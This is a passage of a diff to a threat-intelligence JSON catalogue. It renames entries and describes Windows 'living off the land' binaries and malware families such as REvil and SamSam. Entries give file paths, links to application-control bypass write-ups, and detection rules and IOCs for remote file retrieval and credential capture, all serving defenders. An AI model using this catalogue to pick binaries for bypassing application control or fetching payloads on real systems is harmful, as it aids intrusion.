[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) are known to be used by persistent threats. [[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]", @@ -25235,7 +25235,7 @@ } ], "uuid": "39a11044-91eb-4631-9272-b29b46694271", - "value": "Regasm.exe" + "value": "Regasm.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Part of .NET\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/](https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_regasm.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml)\n* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)\n* Splunk: [suspicious_regsvcs_regasm_activity.md](https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md)\n* Splunk: [detect_regasm_with_network_connection.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml)\n* IOC: regasm.exe executing dll file[[LOLBAS Regasm](/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]", @@ -25306,7 +25306,7 @@ } ], "uuid": "f230afe5-bf37-46ae-9f46-124ad37bb0e3", - "value": "Regedit.exe" + "value": "Regedit.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to manipulate registry\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\regedit.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_regedit_import_keys_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml)\n* IOC: regedit.exe reading and writing to alternate data stream\n* IOC: regedit.exe should normally not be executed by end-users[[Regedit.exe - LOLBAS Project](/references/86e47198-751b-4754-8741-6dd8f2960416)]", @@ -25370,7 +25370,7 @@ } ], "uuid": "16554d65-2a29-4401-9930-cad7f681a7e3", - "value": "Regini.exe" + "value": "Regini.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to manipulate the registry\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\regini.exe\n* C:\\Windows\\SysWOW64\\regini.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_regini_ads.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml)\n* Sigma: [proc_creation_win_regini_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml)\n* IOC: regini.exe reading from ADS[[Regini.exe - LOLBAS Project](/references/db2573d2-6ecd-4c5a-b038-2f799f9723ae)]", @@ -25413,7 +25413,7 @@ } ], "uuid": "17ba6fd7-2072-4ef8-955a-87ccea4f9ec9", - "value": "Register-cimprovider.exe" + "value": "Register-cimprovider.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to register new wmi providers\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Register-cimprovider.exe\n* C:\\Windows\\SysWOW64\\Register-cimprovider.exe\n\n**Resources:**\n* [https://twitter.com/PhilipTsukerman/status/992021361106268161](https://twitter.com/PhilipTsukerman/status/992021361106268161)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_register_cimprovider.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml)\n* IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious[[Register-cimprovider.exe - LOLBAS Project](/references/d445d016-c4f1-45c8-929d-913867275417)]", @@ -25456,7 +25456,7 @@ } ], "uuid": "784ed6e9-5db4-4aeb-ac49-a5e402062a89", - "value": "Regsvcs.exe" + "value": "Regsvcs.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\Windows\\Microsoft.NET\\Framework\\v*\\regsvcs.exe\n* c:\\Windows\\Microsoft.NET\\Framework64\\v*\\regsvcs.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/](https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_regasm.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml)\n* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)\n* Splunk: [detect_regsvcs_with_network_connection.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml)[[LOLBAS Regsvcs](/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]", @@ -25499,7 +25499,7 @@ } ], "uuid": "400f3e02-f6b9-405a-8cd0-12dcf81cf4e4", - "value": "Regsvr32.exe" + "value": "Regsvr32.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to register dlls\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\regsvr32.exe\n* C:\\Windows\\SysWOW64\\regsvr32.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/](https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_regsvr32_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml)\n* Sigma: [proc_creation_win_regsvr32_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml)\n* Sigma: [proc_creation_win_regsvr32_susp_exec_path_1.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml)\n* Sigma: [proc_creation_win_regsvr32_network_pattern.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml)\n* Sigma: [net_connection_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml)\n* Sigma: [dns_query_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml)\n* Sigma: [proc_creation_win_regsvr32_flags_anomaly.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Splunk: [detect_regsvr32_application_control_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)\n* IOC: regsvr32.exe retrieving files from Internet\n* IOC: regsvr32.exe executing scriptlet (sct) files\n* IOC: DotNet CLR libraries loaded into regsvr32.exe\n* IOC: DotNet CLR Usage Log - regsvr32.exe.log[[LOLBAS Regsvr32](/references/8e32abef-534e-475a-baad-946b6ec681c1)]", @@ -25639,7 +25639,7 @@ } ], "uuid": "fcde468a-6c78-46b0-967a-240fcbe815f6", - "value": "Remote.exe" + "value": "Remote.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging tool included with Windows Debugging Tools\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe\n\n**Resources:**\n* [https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/](https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/)\n\n**Detection:**\n* IOC: remote.exe process spawns\n* Sigma: [proc_creation_win_lolbin_remote.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml)[[Remote.exe - LOLBAS Project](/references/9a298f83-80b8-45a3-9f63-6119be6621b4)]", @@ -25730,7 +25730,7 @@ } ], "uuid": "4535e2aa-6351-4200-9e81-ea1a883bc6d3", - "value": "ProjectSauron" + "value": "ProjectSauron - Associated Software" }, { "description": "", @@ -25744,7 +25744,7 @@ } ], "uuid": "818bf505-64bb-43da-88ae-58c60c8590b3", - "value": "Backdoor.Remsec" + "value": "Backdoor.Remsec - Associated Software" }, { "description": "[Remsec](https://app.tidalcyber.com/software/e3729cff-f25e-4c01-a7a1-e8b83e903b30) is a modular backdoor that has been used by [Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. [[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)]", @@ -25793,7 +25793,7 @@ } ], "uuid": "9e22fb92-6276-4af9-8394-9d6f8a62df9b", - "value": "Replace.exe" + "value": "Replace.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to replace file with another file\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\replace.exe\n* C:\\Windows\\SysWOW64\\replace.exe\n\n**Resources:**\n* [https://twitter.com/elceef/status/986334113941655553](https://twitter.com/elceef/status/986334113941655553)\n* [https://twitter.com/elceef/status/986842299861782529](https://twitter.com/elceef/status/986842299861782529)\n\n**Detection:**\n* IOC: Replace.exe retrieving files from remote server\n* Sigma: [proc_creation_win_lolbin_replace.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml)[[Replace.exe - LOLBAS Project](/references/82a473e9-208c-4c47-bf38-92aee43238dd)]", @@ -25897,7 +25897,7 @@ } ], "uuid": "6fcd580a-ca00-4d56-95e5-d33d34d9da3a", - "value": "Sodinokibi" + "value": "Sodinokibi - Associated Software" }, { "description": "[[Intel 471 REvil March 2020](https://app.tidalcyber.com/references/b939dc98-e00e-4d47-84a4-3eaaeb5c0abf)][[Kaspersky Sodin July 2019](https://app.tidalcyber.com/references/ea46271d-3251-4bd7-afa8-f1bd7baf9570)]", @@ -25911,7 +25911,7 @@ } ], "uuid": "37fc63a5-5059-4fd9-b598-ae195d9f7d1f", - "value": "Sodin" + "value": "Sodin - Associated Software" }, { "description": "[REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)][[Intel 471 REvil March 2020](https://app.tidalcyber.com/references/b939dc98-e00e-4d47-84a4-3eaaeb5c0abf)][[Group IB Ransomware May 2020](https://app.tidalcyber.com/references/18d20965-f1f4-439f-a4a3-34437ad1fe14)]", @@ -26316,7 +26316,7 @@ } ], "uuid": "86869abd-b428-4415-91be-d5413eeac0b5", - "value": "Rpcping.exe" + "value": "Rpcping.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to verify rpc connection\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\rpcping.exe\n* C:\\Windows\\SysWOW64\\rpcping.exe\n\n**Resources:**\n* [https://github.com/vysec/RedTips](https://github.com/vysec/RedTips)\n* [https://twitter.com/vysecurity/status/974806438316072960](https://twitter.com/vysecurity/status/974806438316072960)\n* [https://twitter.com/vysecurity/status/873181705024266241](https://twitter.com/vysecurity/status/873181705024266241)\n* [https://twitter.com/splinter_code/status/1421144623678988298](https://twitter.com/splinter_code/status/1421144623678988298)\n\n**Detection:**\n* Sigma: [proc_creation_win_rpcping_credential_capture.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml)[[Rpcping.exe - LOLBAS Project](/references/dc15a187-4de7-422e-a507-223e89e317b1)]", @@ -26381,7 +26381,7 @@ } ], "uuid": "eca6bc18-bb6c-473e-b034-8362ead4e250", - "value": "Redaman" + "value": "Redaman - Associated Software" }, { "description": "[RTM](https://app.tidalcyber.com/software/1836485e-a3a6-4fae-a15d-d0990788811a) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://app.tidalcyber.com/groups/666ab5f0-3ef1-4e74-8a10-65c60a7d1acd)). Newer versions of the malware have been reported publicly as Redaman.[[ESET RTM Feb 2017](https://app.tidalcyber.com/references/ab2cced7-05b8-4788-8d3c-8eadb0aaf38c)][[Unit42 Redaman January 2019](https://app.tidalcyber.com/references/433cd55a-f912-4d5a-aff6-92133d08267b)]", @@ -26484,7 +26484,7 @@ } ], "uuid": "8919f626-0b08-4d5c-9872-b95a10b5e06b", - "value": "Rundll32.exe" + "value": "Rundll32.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute dll files\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\rundll32.exe\n* C:\\Windows\\SysWOW64\\rundll32.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/](https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/)\n* [https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7](https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n* [https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/](https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/)\n* [https://github.com/sailay1996/expl-bin/blob/master/obfus.md](https://github.com/sailay1996/expl-bin/blob/master/obfus.md)\n* [https://github.com/sailay1996/misc-bin/blob/master/rundll32.md](https://github.com/sailay1996/misc-bin/blob/master/rundll32.md)\n* [https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90](https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90)\n* [https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code](https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code)\n\n**Detection:**\n* Sigma: [net_connection_win_rundll32_net_connections.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml)\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Elastic: [defense_evasion_unusual_network_connection_via_rundll32.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml)\n* IOC: Outbount Internet/network connections made from rundll32\n* IOC: Suspicious use of cmdline flags such as -sta[[Rundll32.exe - LOLBAS Project](/references/90aff246-ce27-4f21-96f9-38543718ab07)]", @@ -26603,7 +26603,7 @@ } ], "uuid": "e45aa3ea-628a-4b78-ae7c-bc9c9bf0c2fa", - "value": "Runexehelper.exe" + "value": "Runexehelper.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Launcher process\n\n**Author:** Grzegorz Tworek\n\n**Paths:**\n* c:\\windows\\system32\\runexehelper.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1206692239839289344](https://twitter.com/0gtweet/status/1206692239839289344)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_runexehelper.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml)\n* IOC: c:\\windows\\system32\\runexehelper.exe is run\n* IOC: Existence of runexewithargs_output.txt file[[Runexehelper.exe - LOLBAS Project](/references/86ff0379-2b73-4981-9f13-2b02b53bc90f)]", @@ -26667,7 +26667,7 @@ } ], "uuid": "1879fe72-07da-461e-8f70-af95440b65de", - "value": "Runonce.exe" + "value": "Runonce.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Executes a Run Once Task that has been configured in the registry\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\runonce.exe\n* C:\\Windows\\SysWOW64\\runonce.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/990717080805789697](https://twitter.com/pabraeken/status/990717080805789697)\n* [https://cmatskas.com/configure-a-runonce-task-on-windows/](https://cmatskas.com/configure-a-runonce-task-on-windows/)\n\n**Detection:**\n* Sigma: [registry_event_runonce_persistence.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml)\n* Sigma: [proc_creation_win_runonce_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml)\n* Elastic: [persistence_run_key_and_startup_broad.toml](https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml)\n* IOC: Registy key add - HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\YOURKEY[[Runonce.exe - LOLBAS Project](/references/b97d4b16-ead2-4cc7-90e5-f8b05d84faf3)]", @@ -26710,7 +26710,7 @@ } ], "uuid": "f5e4afa0-6094-4fd1-8472-a459b5687cc9", - "value": "Runscripthelper.exe" + "value": "Runscripthelper.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Execute target PowerShell script\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe\n* C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe\n\n**Resources:**\n* [https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc](https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_runscripthelper.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Event 4014 - Powershell logging\n* IOC: Event 400[[Runscripthelper.exe - LOLBAS Project](/references/6d7151e3-685a-4dc7-a44d-aefae4f3db6a)]", @@ -26819,7 +26819,7 @@ } ], "uuid": "8e87c30d-7a04-431a-9182-8991ed0e4464", - "value": "Sakurel" + "value": "Sakurel - Associated Software" }, { "description": "", @@ -26833,7 +26833,7 @@ } ], "uuid": "b27db543-4db8-4cf6-9321-c511efa7ecb7", - "value": "VIPER" + "value": "VIPER - Associated Software" }, { "description": "[Sakula](https://app.tidalcyber.com/software/a316c704-144a-4d14-8e4e-685bb6ae391c) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. [[Dell Sakula](https://app.tidalcyber.com/references/e9a2ffd8-7aed-4343-8678-66fc3e758d19)]", @@ -26883,7 +26883,7 @@ } ], "uuid": "accecc38-6a70-4fe4-97a2-86df1e07dbcb", - "value": "Samas" + "value": "Samas - Associated Software" }, { "description": "[SamSam](https://app.tidalcyber.com/software/88831e9f-453e-466f-9510-9acaa1f20368) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)][[Talos SamSam Jan 2018](https://app.tidalcyber.com/references/0965bb64-be96-46b9-b60f-6829c43a661f)][[Sophos SamSam Apr 2018](https://app.tidalcyber.com/references/4da5e9c3-7205-4a6e-b147-be7c971380f0)][[Symantec SamSam Oct 2018](https://app.tidalcyber.com/references/c5022a91-bdf4-4187-9967-dfe6362219ea)]", @@ -26953,7 +26953,7 @@ } ], "uuid": "51b405bf-637a-46e7-960f-44f7e964ca7e", - "value": "Sc.exe" + "value": "Sc.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to manage services\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\sc.exe\n* C:\\Windows\\SysWOW64\\sc.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_service_creation.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml)\n* Sigma: [proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml)\n* Sigma: [proc_creation_win_sc_service_path_modification.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml)\n* Splunk: [sc_exe_manipulating_windows_services.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml)\n* Elastic: 